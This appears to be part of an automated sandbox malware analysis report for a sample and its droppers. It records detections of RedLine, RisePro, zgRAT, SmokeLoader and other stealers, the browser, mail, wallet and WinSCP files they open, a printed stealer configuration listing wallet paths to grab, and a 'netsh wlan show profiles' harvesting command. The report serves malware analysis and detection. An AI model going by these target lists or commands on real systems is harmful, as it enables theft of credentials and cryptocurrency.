Source: 9AED.exe, 00000018.00000003.2627435930.0000000009538000.00000004.00000020.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2810587718.0000000009538000.00000004.00000020.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2623665861.0000000009533000.00000004.00000020.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2624467329.0000000009537000.00000004.00000020.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2755282075.0000000008714000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 31.2.C4AD.exe.c000368000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.2zx1310.exe.a01000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.c00035e000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.1fec5590000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.9AED.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.jtfCFDmLdX.exe.50b2220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000368000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000574000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.9AED.exe.570000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.jsc.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0004f8000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0004f8000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.c000368000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0003a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.1fec5540000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000530000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.2zx1310.exe.a01000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000530000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.1fec5590000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0003a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000574000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.c000368000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.2zx1310.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000003.2176077737.000000C00035E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2371460377.000000C000566000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1650336900.0000000004F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2630979082.0000000000572000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2371460377.000000C000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2743323065.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2243089557.000001FEC5590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2312747036.000001FEC5542000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1825048903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2368648905.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2743323065.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2630661047.0000000000416000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2368648905.000000C000368000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2371460377.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7FE0.exe PID: 348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9AED.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data, type: DROPPED

Yara detected RisePro Stealer

Source: Yara match

File source: Process Memory Space: AppLaunch.exe PID: 2020, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 43.2.D9EC.exe.27d948bd660.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d9483d628.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d948bd660.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d949bd698.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d9cc00000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d9cc00000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d949bd698.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 10.2.5zQ4dC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.5zQ4dC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe, type: DROPPED

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8F82.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8F82.exe PID: 3548, type: MEMORYSTR

Yara detected PrivateLoader

Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: tor-real.exe, 0000001D.00000003.2207050094.0000000004659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: r electroncash BcYhtE72gziJrnt+KgtHZWnEfjc 2038-01-01 00:00:00 193.135.10.219 59999 0
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strIng>ExodUs.cOnf.Json
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: counts.xml</string><string>Apps\Pidgin</string></args></command><command name="5"><args><string>Telegram;tdata</string><string>%AppData%\Telegram Desktop\tdata</string><string>s;????????????????\s</string><string>Grabber\Telegram</string></args></command><command name="0"><args><string>%AppData%\ledger live</string><string>app.json</string><string>Grabber\Wallets\Ledger</string></args></command><command name="0"><args><string>%AppData%\atomic\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Atomic</string></args></command><command name="0"><args><string>%AppData%\WalletWasabi\Client\Wallets</string><string>.json</string><string>Grabber\Wallets\Wasabi</string></args></command><command name="0"><args><string>%AppData%\Binance</string><string>.json</string><string>Grabber\Wallets\Binance</string></args></command><command name="0"><args><string>%AppData%\Guarda\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\Guarda</string></args></command><command name="0"><args><string>%LocalAppData%\Coinomi\Coinomi\wallets</string><string>.wallet</string><string>Grabber\Wallets\Coinomi</string></args></command><command name="0"><args><string>%AppData%\Bitcoin\wallets</string><string>\wallet</string><string>Grabber\Wallets\Bitcoin</string></args></command><command name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string></args></command><command name="3"><args><string>Ronin</string><string>fnjhmkhhmkbjkkabndcnnogagogbneec</string></args></command><command name="3"><args><string>BinanceChain</string><string>fhbohimaelbohpjbbldcngcnapndodjp</string></args></command><command name="3"><args><string>TronLink</string><string>ibnejdf
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: 6rR8iy1.exe, 0000000C.00000003.1757109513.00000000004CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LocalPrefs.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\7FE0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\8427.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\9AED.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\8427.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Source: Yara match	File source: 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2743323065.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7FE0.exe PID: 348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9AED.exe PID: 3340, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 31.2.C4AD.exe.c000368000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.2zx1310.exe.a01000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.c00035e000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.1fec5590000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.9AED.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.jtfCFDmLdX.exe.50b2220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000368000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000574000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.9AED.exe.570000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.jsc.exe.550000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0004f8000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0004f8000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.c000368000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0003a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.1fec5540000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000530000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.2zx1310.exe.a01000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000530000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.1fec5590000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c0003a0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.C4AD.exe.c000574000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.C4AD.exe.c000368000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.2zx1310.exe.850000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000003.2176077737.000000C00035E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2371460377.000000C000566000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1650336900.0000000004F58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2630979082.0000000000572000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2371460377.000000C000530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2743323065.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2243089557.000001FEC5590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2312747036.000001FEC5542000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1825048903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2368648905.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2743323065.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2630661047.0000000000416000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2368648905.000000C000368000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2371460377.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AppLaunch.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7FE0.exe PID: 348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9AED.exe PID: 3340, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data, type: DROPPED

Yara detected RisePro Stealer

Source: Yara match

File source: Process Memory Space: AppLaunch.exe PID: 2020, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 43.2.D9EC.exe.27d948bd660.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d9483d628.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d948bd660.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d949bd698.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d9cc00000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d9cc00000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.D9EC.exe.27d949bd698.11.unpack, type: UNPACKEDPE
